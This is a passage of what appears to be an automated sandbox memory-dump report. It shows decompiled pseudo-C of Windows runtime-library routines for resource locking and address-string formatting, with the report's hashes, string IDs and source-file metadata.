                                                                                                                                                        										__eflags = _t56;
                                                                                                                                                        										if(_t56 != 0) {
                                                                                                                                                        											L40:
                                                                                                                                                        											_t128 = 0;
                                                                                                                                                        											__eflags = 0;
                                                                                                                                                        											while(1) {
                                                                                                                                                        												_t121 =  *(_t96 + 0x30) & 0x00000001;
                                                                                                                                                        												asm("sbb esi, esi");
                                                                                                                                                        												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x009a01c0;
                                                                                                                                                        												_push(_t138);
                                                                                                                                                        												_push(0);
                                                                                                                                                        												_t58 = E008BF8CC( *((intOrPtr*)(_t96 + 0x20)));
                                                                                                                                                        												__eflags = _t58 - 0x102;
                                                                                                                                                        												if(_t58 != 0x102) {
                                                                                                                                                        													break;
                                                                                                                                                        												}
                                                                                                                                                        												_t107 =  *(_t138 + 4);
                                                                                                                                                        												_t125 =  *_t138;
                                                                                                                                                        												_t75 = E00904FC0(_t125, _t107, 0xff676980, 0xffffffff);
                                                                                                                                                        												_push(_t125);
                                                                                                                                                        												_push(_t75);
                                                                                                                                                        												E00913F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
                                                                                                                                                        												E00913F92(0x65, 0, "RTL: Resource at %p\n", _t96);
                                                                                                                                                        												_t128 = _t128 + 1;
                                                                                                                                                        												_t159 = _t158 + 0x28;
                                                                                                                                                        												__eflags = _t128 - 2;
                                                                                                                                                        												if(__eflags > 0) {
                                                                                                                                                        													E0094217A(_t107, __eflags, _t96);
                                                                                                                                                        												}
                                                                                                                                                        												_push("RTL: Re-Waiting\n");
                                                                                                                                                        												_push(0);
                                                                                                                                                        												_push(0x65);
                                                                                                                                                        												E00913F92();
                                                                                                                                                        												_t158 = _t159 + 0xc;
                                                                                                                                                        											}
                                                                                                                                                        											__eflags = _t58;
                                                                                                                                                        											if(__eflags < 0) {
                                                                                                                                                        												_push(_t58);
                                                                                                                                                        												E00903915(_t96, _t107, _t121, _t128, _t138, __eflags);
                                                                                                                                                        												asm("int3");
                                                                                                                                                        												_t61 =  *_t107;
                                                                                                                                                        												 *_t107 = 0;
                                                                                                                                                        												__eflags = _t61;
                                                                                                                                                        												if(_t61 == 0) {
                                                                                                                                                        													L1:
                                                                                                                                                        													_t63 = E008E5384(_t138 + 0x24);
                                                                                                                                                        													if(_t63 != 0) {
                                                                                                                                                        														goto L52;
                                                                                                                                                        													} else {
                                                                                                                                                        														goto L2;
                                                                                                                                                        													}
                                                                                                                                                        												} else {
                                                                                                                                                        													_t123 =  *((intOrPtr*)(_t138 + 0x18));
                                                                                                                                                        													_push( &_a4);
                                                                                                                                                        													_push(_t61);
                                                                                                                                                        													_t70 = E008BF970( *((intOrPtr*)(_t138 + 0x18)));
                                                                                                                                                        													__eflags = _t70;
                                                                                                                                                        													if(__eflags >= 0) {
                                                                                                                                                        														goto L1;
                                                                                                                                                        													} else {
                                                                                                                                                        														_push(_t70);
                                                                                                                                                        														E00903915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
                                                                                                                                                        														L52:
                                                                                                                                                        														_t122 =  *((intOrPtr*)(_t138 + 0x20));
                                                                                                                                                        														_push( &_a4);
                                                                                                                                                        														_push(1);
                                                                                                                                                        														_t63 = E008BF970( *((intOrPtr*)(_t138 + 0x20)));
                                                                                                                                                        														__eflags = _t63;
                                                                                                                                                        														if(__eflags >= 0) {
                                                                                                                                                        															L2:
                                                                                                                                                        															return _t63;
                                                                                                                                                        														} else {
                                                                                                                                                        															_push(_t63);
                                                                                                                                                        															E00903915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
                                                                                                                                                        															_t109 =  *((intOrPtr*)(_t138 + 0x20));
                                                                                                                                                        															_push( &_a4);
                                                                                                                                                        															_push(1);
                                                                                                                                                        															_t63 = E008BF970( *((intOrPtr*)(_t138 + 0x20)));
                                                                                                                                                        															__eflags = _t63;
                                                                                                                                                        															if(__eflags >= 0) {
                                                                                                                                                        																goto L2;
                                                                                                                                                        															} else {
                                                                                                                                                        																_push(_t63);
                                                                                                                                                        																_t66 = E00903915(_t96, _t109, _t122, _t128, _t138, __eflags);
                                                                                                                                                        																asm("int3");
                                                                                                                                                        																while(1) {
                                                                                                                                                        																	_t110 = _t66;
                                                                                                                                                        																	__eflags = _t66 - 1;
                                                                                                                                                        																	if(_t66 != 1) {
                                                                                                                                                        																		break;
                                                                                                                                                        																	}
                                                                                                                                                        																	_t128 = _t128 | 0xffffffff;
                                                                                                                                                        																	_t66 = _t110;
                                                                                                                                                        																	asm("lock cmpxchg [ebx], edi");
                                                                                                                                                        																	__eflags = _t66 - _t110;
                                                                                                                                                        																	if(_t66 != _t110) {
                                                                                                                                                        																		continue;
                                                                                                                                                        																	} else {
                                                                                                                                                        																		_t67 =  *[fs:0x18];
                                                                                                                                                        																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
                                                                                                                                                        																		return _t67;
                                                                                                                                                        																	}
                                                                                                                                                        																	goto L59;
                                                                                                                                                        																}
                                                                                                                                                        																E008E5329(_t110, _t138);
                                                                                                                                                        																_t69 = E008E53A5(_t138, 1);
                                                                                                                                                        																return _t69;
                                                                                                                                                        															}
                                                                                                                                                        														}
                                                                                                                                                        													}
                                                                                                                                                        												}
                                                                                                                                                        											} else {
                                                                                                                                                        												_t56 =  *(_t96 + 0x28);
                                                                                                                                                        												goto L3;
                                                                                                                                                        											}
                                                                                                                                                        										} else {
                                                                                                                                                        											_t107 =  *_t119;
                                                                                                                                                        											__eflags = _t107;
                                                                                                                                                        											if(__eflags > 0) {
                                                                                                                                                        												while(1) {
                                                                                                                                                        													_t81 = _t107;
                                                                                                                                                        													asm("lock cmpxchg [edi], esi");
                                                                                                                                                        													__eflags = _t81 - _t107;
                                                                                                                                                        													if(_t81 == _t107) {
                                                                                                                                                        														break;
                                                                                                                                                        													}
                                                                                                                                                        													_t107 = _t81;
                                                                                                                                                        													__eflags = _t81;
                                                                                                                                                        													if(_t81 > 0) {
                                                                                                                                                        														continue;
                                                                                                                                                        													}
                                                                                                                                                        													break;
                                                                                                                                                        												}
                                                                                                                                                        												_t56 = _a4;
                                                                                                                                                        												__eflags = _t107;
                                                                                                                                                        											}
                                                                                                                                                        											if(__eflags != 0) {
                                                                                                                                                        												while(1) {
                                                                                                                                                        													L3:
                                                                                                                                                        													__eflags = _t56;
                                                                                                                                                        													if(_t56 != 0) {
                                                                                                                                                        														goto L32;
                                                                                                                                                        													}
                                                                                                                                                        													_t107 = _t107 | 0xffffffff;
                                                                                                                                                        													_t56 = 0;
                                                                                                                                                        													asm("lock cmpxchg [edx], ecx");
                                                                                                                                                        													__eflags = 0;
                                                                                                                                                        													if(0 != 0) {
                                                                                                                                                        														continue;
                                                                                                                                                        													} else {
                                                                                                                                                        														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                                                                                                                        														return 1;
                                                                                                                                                        													}
                                                                                                                                                        													goto L59;
                                                                                                                                                        												}
                                                                                                                                                        												continue;
                                                                                                                                                        											} else {
                                                                                                                                                        												goto L40;
                                                                                                                                                        											}
                                                                                                                                                        										}
                                                                                                                                                        										goto L59;
                                                                                                                                                        									}
                                                                                                                                                        									__eflags = 0;
                                                                                                                                                        									return 0;
                                                                                                                                                        								} else {
                                                                                                                                                        									_t115 =  *(_t96 + 0x28);
                                                                                                                                                        									continue;
                                                                                                                                                        								}
                                                                                                                                                        							} else {
                                                                                                                                                        								_t106 =  *_t49;
                                                                                                                                                        								__eflags = _t106;
                                                                                                                                                        								if(__eflags > 0) {
                                                                                                                                                        									while(1) {
                                                                                                                                                        										_t93 = _t106;
                                                                                                                                                        										asm("lock cmpxchg [edi], esi");
                                                                                                                                                        										__eflags = _t93 - _t106;
                                                                                                                                                        										if(_t93 == _t106) {
                                                                                                                                                        											break;
                                                                                                                                                        										}
                                                                                                                                                        										_t106 = _t93;
                                                                                                                                                        										__eflags = _t93;
                                                                                                                                                        										if(_t93 > 0) {
                                                                                                                                                        											continue;
                                                                                                                                                        										}
                                                                                                                                                        										break;
                                                                                                                                                        									}
                                                                                                                                                        									__eflags = _t106;
                                                                                                                                                        								}
                                                                                                                                                        								if(__eflags != 0) {
                                                                                                                                                        									continue;
                                                                                                                                                        								} else {
                                                                                                                                                        									goto L23;
                                                                                                                                                        								}
                                                                                                                                                        							}
                                                                                                                                                        						}
                                                                                                                                                        						goto L59;
                                                                                                                                                        					}
                                                                                                                                                        					_t84 = _t115;
                                                                                                                                                        					asm("lock cmpxchg [esi], ecx");
                                                                                                                                                        					__eflags = _t84 - _t115;
                                                                                                                                                        					if(_t84 != _t115) {
                                                                                                                                                        						_t115 = _t84;
                                                                                                                                                        						goto L7;
                                                                                                                                                        					} else {
                                                                                                                                                        						return 1;
                                                                                                                                                        					}
                                                                                                                                                        				}
                                                                                                                                                        				L59:
                                                                                                                                                        			}




































                                                                                                                                                        0x0092229a
                                                                                                                                                        0x009222a1
                                                                                                                                                        0x009222a3
                                                                                                                                                        0x009222a7
                                                                                                                                                        0x009222a9
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x009222ab
                                                                                                                                                        0x009222ad
                                                                                                                                                        0x009222af
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x009222af
                                                                                                                                                        0x009222b1
                                                                                                                                                        0x009222b4
                                                                                                                                                        0x009222b4
                                                                                                                                                        0x009222b6
                                                                                                                                                        0x008e53be
                                                                                                                                                        0x008e53be
                                                                                                                                                        0x008e53be
                                                                                                                                                        0x008e53c0
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x008e53cb
                                                                                                                                                        0x008e53ce
                                                                                                                                                        0x008e53d0
                                                                                                                                                        0x008e53d4
                                                                                                                                                        0x008e53d6
                                                                                                                                                        0x00000000
                                                                                                                                                        0x008e53d8
                                                                                                                                                        0x008e53e3
                                                                                                                                                        0x008e53ea
                                                                                                                                                        0x008e53ea
                                                                                                                                                        0x00000000
                                                                                                                                                        0x008e53d6
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x009222b6
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0092228f
                                                                                                                                                        0x00922349
                                                                                                                                                        0x0092234d
                                                                                                                                                        0x00922251
                                                                                                                                                        0x00922251
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00922251
                                                                                                                                                        0x009221a4
                                                                                                                                                        0x009221a4
                                                                                                                                                        0x009221a6
                                                                                                                                                        0x009221a8
                                                                                                                                                        0x009221ac
                                                                                                                                                        0x009221b6
                                                                                                                                                        0x009221b8
                                                                                                                                                        0x009221bc
                                                                                                                                                        0x009221be
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x009221c0
                                                                                                                                                        0x009221c2
                                                                                                                                                        0x009221c4
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x009221c4
                                                                                                                                                        0x009221c6
                                                                                                                                                        0x009221c6
                                                                                                                                                        0x009221c8
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x009221c8
                                                                                                                                                        0x009221a2
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00922183
                                                                                                                                                        0x0090057b
                                                                                                                                                        0x0090057d
                                                                                                                                                        0x00900581
                                                                                                                                                        0x00900583
                                                                                                                                                        0x00922178
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00900589
                                                                                                                                                        0x0090058f
                                                                                                                                                        0x0090058f
                                                                                                                                                        0x00900583
                                                                                                                                                        0x00000000

                                                                                                                                                        APIs
                                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00922206
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000006.00000002.2152022479.00000000008B0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                                        • Associated: 00000006.00000002.2152010678.00000000008A0000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000006.00000002.2152322375.0000000000990000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000006.00000002.2152327355.00000000009A0000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000006.00000002.2152332352.00000000009A4000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000006.00000002.2152336391.00000000009A7000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000006.00000002.2152340781.00000000009B0000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000006.00000002.2152389742.0000000000A10000.00000040.00000001.sdmp
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                        • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                        • API String ID: 885266447-4236105082
                                                                                                                                                        • Opcode ID: b6c632859a1867e37996ac3b7668455394c0d5c30519c82e0b46b11d31c6ac26
                                                                                                                                                        • Instruction ID: 2029c48b347973a1e417023e4c4ed5587bf3c9de51bb9eb2707bfd12ae49ea21
                                                                                                                                                        • Opcode Fuzzy Hash: b6c632859a1867e37996ac3b7668455394c0d5c30519c82e0b46b11d31c6ac26
                                                                                                                                                        • Instruction Fuzzy Hash: E25128357042216FEB14CB19DC81FA633ADEBD4720F218229FD55DB38ADA75EC828790
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        C-Code - Quality: 64%
                                                                                                                                                        			E009014C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
                                                                                                                                                        				signed int _v8;
                                                                                                                                                        				char _v10;
                                                                                                                                                        				char _v140;
                                                                                                                                                        				void* __ebx;
                                                                                                                                                        				void* __edi;
                                                                                                                                                        				void* __esi;
                                                                                                                                                        				signed int _t24;
                                                                                                                                                        				void* _t26;
                                                                                                                                                        				signed int _t29;
                                                                                                                                                        				signed int _t34;
                                                                                                                                                        				signed int _t40;
                                                                                                                                                        				intOrPtr _t45;
                                                                                                                                                        				void* _t51;
                                                                                                                                                        				intOrPtr* _t52;
                                                                                                                                                        				void* _t54;
                                                                                                                                                        				signed int _t57;
                                                                                                                                                        				void* _t58;
                                                                                                                                                        
                                                                                                                                                        				_t51 = __edx;
                                                                                                                                                        				_t24 =  *0x9a2088; // 0x7779c78d
                                                                                                                                                        				_v8 = _t24 ^ _t57;
                                                                                                                                                        				_t45 = _a16;
                                                                                                                                                        				_t53 = _a4;
                                                                                                                                                        				_t52 = _a20;
                                                                                                                                                        				if(_a4 == 0 || _t52 == 0) {
                                                                                                                                                        					L10:
                                                                                                                                                        					_t26 = 0xc000000d;
                                                                                                                                                        				} else {
                                                                                                                                                        					if(_t45 == 0) {
                                                                                                                                                        						if( *_t52 == _t45) {
                                                                                                                                                        							goto L3;
                                                                                                                                                        						} else {
                                                                                                                                                        							goto L10;
                                                                                                                                                        						}
                                                                                                                                                        					} else {
                                                                                                                                                        						L3:
                                                                                                                                                        						_t28 =  &_v140;
                                                                                                                                                        						if(_a12 != 0) {
                                                                                                                                                        							_push("[");
                                                                                                                                                        							_push(0x41);
                                                                                                                                                        							_push( &_v140);
                                                                                                                                                        							_t29 = E008F7707();
                                                                                                                                                        							_t58 = _t58 + 0xc;
                                                                                                                                                        							_t28 = _t57 + _t29 * 2 - 0x88;
                                                                                                                                                        						}
                                                                                                                                                        						_t54 = E009013CB(_t53, _t28);
                                                                                                                                                        						if(_a8 != 0) {
                                                                                                                                                        							_t34 = E008F7707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
                                                                                                                                                        							_t58 = _t58 + 0x10;
                                                                                                                                                        							_t54 = _t54 + _t34 * 2;
                                                                                                                                                        						}
                                                                                                                                                        						if(_a12 != 0) {
                                                                                                                                                        							_t40 = E008F7707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
                                                                                                                                                        							_t58 = _t58 + 0x10;
                                                                                                                                                        							_t54 = _t54 + _t40 * 2;
                                                                                                                                                        						}
                                                                                                                                                        						_t53 = (_t54 -  &_v140 >> 1) + 1;
                                                                                                                                                        						 *_t52 = _t53;
                                                                                                                                                        						if( *_t52 < _t53) {
                                                                                                                                                        							goto L10;
                                                                                                                                                        						} else {
                                                                                                                                                        							E008C2340(_t45,  &_v140, _t53 + _t53);
                                                                                                                                                        							_t26 = 0;
                                                                                                                                                        						}
                                                                                                                                                        					}
                                                                                                                                                        				}
                                                                                                                                                        				return E008CE1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
                                                                                                                                                        			}





















                                                                                                                                                        APIs
                                                                                                                                                        • ___swprintf_l.LIBCMT ref: 0092EA22
                                                                                                                                                          • Part of subcall function 009013CB: ___swprintf_l.LIBCMT ref: 0090146B
                                                                                                                                                          • Part of subcall function 009013CB: ___swprintf_l.LIBCMT ref: 00901490
                                                                                                                                                        • ___swprintf_l.LIBCMT ref: 0090156D
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000006.00000002.2152022479.00000000008B0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                                        • Associated: 00000006.00000002.2152010678.00000000008A0000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000006.00000002.2152322375.0000000000990000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000006.00000002.2152327355.00000000009A0000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000006.00000002.2152332352.00000000009A4000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000006.00000002.2152336391.00000000009A7000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000006.00000002.2152340781.00000000009B0000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000006.00000002.2152389742.0000000000A10000.00000040.00000001.sdmp
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ___swprintf_l
                                                                                                                                                        • String ID: %%%u$]:%u
                                                                                                                                                        • API String ID: 48624451-3050659472
                                                                                                                                                        • Opcode ID: 0b947eaf65a40aa398fb11e08c1526dca05518a3026783b736d9afff915b56d1
                                                                                                                                                        • Instruction ID: d60bb4c4d903ac62cfddf306c8561288ee324dec9172430db109ee52469ae110
                                                                                                                                                        • Opcode Fuzzy Hash: 0b947eaf65a40aa398fb11e08c1526dca05518a3026783b736d9afff915b56d1
                                                                                                                                                        • Instruction Fuzzy Hash: 8D21BF729002299FCB21EE68DC45AEE73BCFB54700F444456F946E7280DB74EA988BE1
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        C-Code - Quality: 62%
                                                                                                                                                        			E00963DA7(void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
                                                                                                                                                        				signed int _v8;
                                                                                                                                                        				char _v11;
                                                                                                                                                        				char _v76;
                                                                                                                                                        				void* __ebx;
                                                                                                                                                        				void* __edi;
                                                                                                                                                        				void* __esi;
                                                                                                                                                        				signed int _t17;
                                                                                                                                                        				void* _t19;
                                                                                                                                                        				void* _t29;
                                                                                                                                                        				void* _t32;
                                                                                                                                                        				void* _t33;
                                                                                                                                                        				intOrPtr _t34;
                                                                                                                                                        				void* _t39;
                                                                                                                                                        				intOrPtr* _t40;
                                                                                                                                                        				void* _t42;
                                                                                                                                                        				signed int _t44;
                                                                                                                                                        				void* _t45;
                                                                                                                                                        
                                                                                                                                                        				_t39 = __edx;
                                                                                                                                                        				_t17 =  *0x9a2088; // 0x7779c78d
                                                                                                                                                        				_v8 = _t17 ^ _t44;
                                                                                                                                                        				_t34 = _a16;
                                                                                                                                                        				_t41 = _a4;
                                                                                                                                                        				_t40 = _a20;
                                                                                                                                                        				if(_a4 == 0 || _t40 == 0 || _t34 == 0 &&  *_t40 != _t34) {
                                                                                                                                                        					L12:
                                                                                                                                                        					_t19 = 0xc000000d;
                                                                                                                                                        				} else {
                                                                                                                                                        					_t21 =  &_v76;
                                                                                                                                                        					if(_a12 != 0) {
                                                                                                                                                        						_push(0x8c9cbe);
                                                                                                                                                        						_push(0x41);
                                                                                                                                                        						_push( &_v76);
                                                                                                                                                        						_t33 = E0097894A();
                                                                                                                                                        						_t45 = _t45 + 0xc;
                                                                                                                                                        						_t21 = _t44 + _t33 - 0x48;
                                                                                                                                                        					}
                                                                                                                                                        					_t42 = E00963B8E(_t41, _t21);
                                                                                                                                                        					if(_a8 != 0) {
                                                                                                                                                        						_t32 = E0097894A(_t42,  &_v11 - _t42, "%%%u", _a8);
                                                                                                                                                        						_t45 = _t45 + 0x10;
                                                                                                                                                        						_t42 = _t42 + _t32;
                                                                                                                                                        					}
                                                                                                                                                        					if(_a12 != 0) {
                                                                                                                                                        						_t29 = E0097894A(_t42,  &_v11 - _t42, "]:%u", _a12 & 0x0000ffff);
                                                                                                                                                        						_t45 = _t45 + 0x10;
                                                                                                                                                        						_t42 = _t42 + _t29;
                                                                                                                                                        					}
                                                                                                                                                        					_t41 = _t42 -  &_v76 + 1;
                                                                                                                                                        					 *_t40 = _t41;
                                                                                                                                                        					if( *_t40 < _t41) {
                                                                                                                                                        						goto L12;
                                                                                                                                                        					} else {
                                                                                                                                                        						E008C2340(_t34,  &_v76, _t41);
                                                                                                                                                        						_t19 = 0;
                                                                                                                                                        					}
                                                                                                                                                        				}
                                                                                                                                                        				return E008CE1B4(_t19, _t34, _v8 ^ _t44, _t39, _t40, _t41);
                                                                                                                                                        			}





















Memory Dump Source
• Source File: 00000006.00000002.2152022479.00000000008B0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: true
• Associated: 00000006.00000002.2152010678.00000000008A0000.00000040.00000001.sdmp
• Associated: 00000006.00000002.2152322375.0000000000990000.00000040.00000001.sdmp
• Associated: 00000006.00000002.2152327355.00000000009A0000.00000040.00000001.sdmp
• Associated: 00000006.00000002.2152332352.00000000009A4000.00000040.00000001.sdmp
• Associated: 00000006.00000002.2152336391.00000000009A7000.00000040.00000001.sdmp
• Associated: 00000006.00000002.2152340781.00000000009B0000.00000040.00000001.sdmp
• Associated: 00000006.00000002.2152389742.0000000000A10000.00000040.00000001.sdmp
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ___swprintf_l
                                                                                                                                                        • String ID: %%%u$]:%u
                                                                                                                                                        • API String ID: 48624451-3050659472
                                                                                                                                                        • Opcode ID: 684bc900f9cfa58f1e3a95f72e88e1ad55824cddb046a8726b7cb665d9b76e40
                                                                                                                                                        • Instruction ID: 059a7f9520018a1c3c6fa65fc03c2c7a1cdb6c1a5d284e58829349d738681e79
                                                                                                                                                        • Opcode Fuzzy Hash: 684bc900f9cfa58f1e3a95f72e88e1ad55824cddb046a8726b7cb665d9b76e40
                                                                                                                                                        • Instruction Fuzzy Hash: 0921AFB290021AABCB21AF698C45AEF77ACEF54714F048525FC08D3241EB759F44C7E1
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        C-Code - Quality: 45%
                                                                                                                                                        			E008E53A5(signed int _a4, char _a8) {
                                                                                                                                                        				void* __ebx;
                                                                                                                                                        				void* __edi;
                                                                                                                                                        				void* __esi;
                                                                                                                                                        				signed int _t32;
                                                                                                                                                        				signed int _t37;
                                                                                                                                                        				signed int _t40;
                                                                                                                                                        				signed int _t42;
                                                                                                                                                        				void* _t45;
                                                                                                                                                        				intOrPtr _t46;
                                                                                                                                                        				void* _t48;
                                                                                                                                                        				signed int _t49;
                                                                                                                                                        				void* _t51;
                                                                                                                                                        				signed int _t57;
                                                                                                                                                        				signed int _t64;
                                                                                                                                                        				signed int _t71;
                                                                                                                                                        				void* _t74;
                                                                                                                                                        				intOrPtr _t78;
                                                                                                                                                        				signed int* _t79;
                                                                                                                                                        				void* _t85;
                                                                                                                                                        				signed int _t86;
                                                                                                                                                        				signed int _t92;
                                                                                                                                                        				void* _t104;
                                                                                                                                                        				void* _t105;
                                                                                                                                                        
                                                                                                                                                        				_t64 = _a4;
                                                                                                                                                        				_t32 =  *(_t64 + 0x28);
                                                                                                                                                        				_t71 = _t64 + 0x28;
                                                                                                                                                        				_push(_t92);
                                                                                                                                                        				if(_t32 < 0) {
                                                                                                                                                        					_t78 =  *[fs:0x18];
                                                                                                                                                        					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
                                                                                                                                                        					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
                                                                                                                                                        						goto L3;
                                                                                                                                                        					} else {
                                                                                                                                                        						__eflags = _t32 | 0xffffffff;
                                                                                                                                                        						asm("lock xadd [ecx], eax");
                                                                                                                                                        						return 1;
                                                                                                                                                        					}
                                                                                                                                                        				} else {
                                                                                                                                                        					L3:
                                                                                                                                                        					_push(_t86);
                                                                                                                                                        					while(1) {
                                                                                                                                                        						L4:
                                                                                                                                                        						__eflags = _t32;
                                                                                                                                                        						if(_t32 == 0) {
                                                                                                                                                        							break;
                                                                                                                                                        						}
                                                                                                                                                        						__eflags = _a8;
                                                                                                                                                        						if(_a8 == 0) {
                                                                                                                                                        							__eflags = 0;
                                                                                                                                                        							return 0;
                                                                                                                                                        						} else {
                                                                                                                                                        							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
                                                                                                                                                        							_t79 = _t64 + 0x24;
                                                                                                                                                        							_t71 = 1;
                                                                                                                                                        							asm("lock xadd [eax], ecx");
                                                                                                                                                        							_t32 =  *(_t64 + 0x28);
                                                                                                                                                        							_a4 = _t32;
                                                                                                                                                        							__eflags = _t32;
                                                                                                                                                        							if(_t32 != 0) {
                                                                                                                                                        								L19:
                                                                                                                                                        								_t86 = 0;
                                                                                                                                                        								__eflags = 0;
                                                                                                                                                        								while(1) {
                                                                                                                                                        									_t81 =  *(_t64 + 0x30) & 0x00000001;
                                                                                                                                                        									asm("sbb esi, esi");
                                                                                                                                                        									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x009a01c0;
                                                                                                                                                        									_push(_t92);
                                                                                                                                                        									_push(0);
                                                                                                                                                        									_t37 = E008BF8CC( *((intOrPtr*)(_t64 + 0x20)));
                                                                                                                                                        									__eflags = _t37 - 0x102;
                                                                                                                                                        									if(_t37 != 0x102) {
                                                                                                                                                        										break;
                                                                                                                                                        									}
                                                                                                                                                        									_t71 =  *(_t92 + 4);
                                                                                                                                                        									_t85 =  *_t92;
                                                                                                                                                        									_t51 = E00904FC0(_t85, _t71, 0xff676980, 0xffffffff);
                                                                                                                                                        									_push(_t85);
                                                                                                                                                        									_push(_t51);
                                                                                                                                                        									E00913F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
                                                                                                                                                        									E00913F92(0x65, 0, "RTL: Resource at %p\n", _t64);
                                                                                                                                                        									_t86 = _t86 + 1;
                                                                                                                                                        									_t105 = _t104 + 0x28;
                                                                                                                                                        									__eflags = _t86 - 2;
                                                                                                                                                        									if(__eflags > 0) {
                                                                                                                                                        										E0094217A(_t71, __eflags, _t64);
                                                                                                                                                        									}
                                                                                                                                                        									_push("RTL: Re-Waiting\n");
                                                                                                                                                        									_push(0);
                                                                                                                                                        									_push(0x65);
                                                                                                                                                        									E00913F92();
                                                                                                                                                        									_t104 = _t105 + 0xc;
                                                                                                                                                        								}
                                                                                                                                                        								__eflags = _t37;
                                                                                                                                                        								if(__eflags < 0) {
                                                                                                                                                        									_push(_t37);
                                                                                                                                                        									E00903915(_t64, _t71, _t81, _t86, _t92, __eflags);
                                                                                                                                                        									asm("int3");
                                                                                                                                                        									_t40 =  *_t71;
                                                                                                                                                        									 *_t71 = 0;
                                                                                                                                                        									__eflags = _t40;
                                                                                                                                                        									if(_t40 == 0) {
                                                                                                                                                        										L1:
                                                                                                                                                        										_t42 = E008E5384(_t92 + 0x24);
                                                                                                                                                        										if(_t42 != 0) {
                                                                                                                                                        											goto L31;
                                                                                                                                                        										} else {
                                                                                                                                                        											goto L2;
                                                                                                                                                        										}
                                                                                                                                                        									} else {
                                                                                                                                                        										_t83 =  *((intOrPtr*)(_t92 + 0x18));
                                                                                                                                                        										_push( &_a4);
                                                                                                                                                        										_push(_t40);
                                                                                                                                                        										_t49 = E008BF970( *((intOrPtr*)(_t92 + 0x18)));
                                                                                                                                                        										__eflags = _t49;
                                                                                                                                                        										if(__eflags >= 0) {
                                                                                                                                                        											goto L1;
                                                                                                                                                        										} else {
                                                                                                                                                        											_push(_t49);
                                                                                                                                                        											E00903915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
                                                                                                                                                        											L31:
                                                                                                                                                        											_t82 =  *((intOrPtr*)(_t92 + 0x20));
                                                                                                                                                        											_push( &_a4);
                                                                                                                                                        											_push(1);
                                                                                                                                                        											_t42 = E008BF970( *((intOrPtr*)(_t92 + 0x20)));
                                                                                                                                                        											__eflags = _t42;
                                                                                                                                                        											if(__eflags >= 0) {
                                                                                                                                                        												L2:
                                                                                                                                                        												return _t42;
                                                                                                                                                        											} else {
                                                                                                                                                        												_push(_t42);
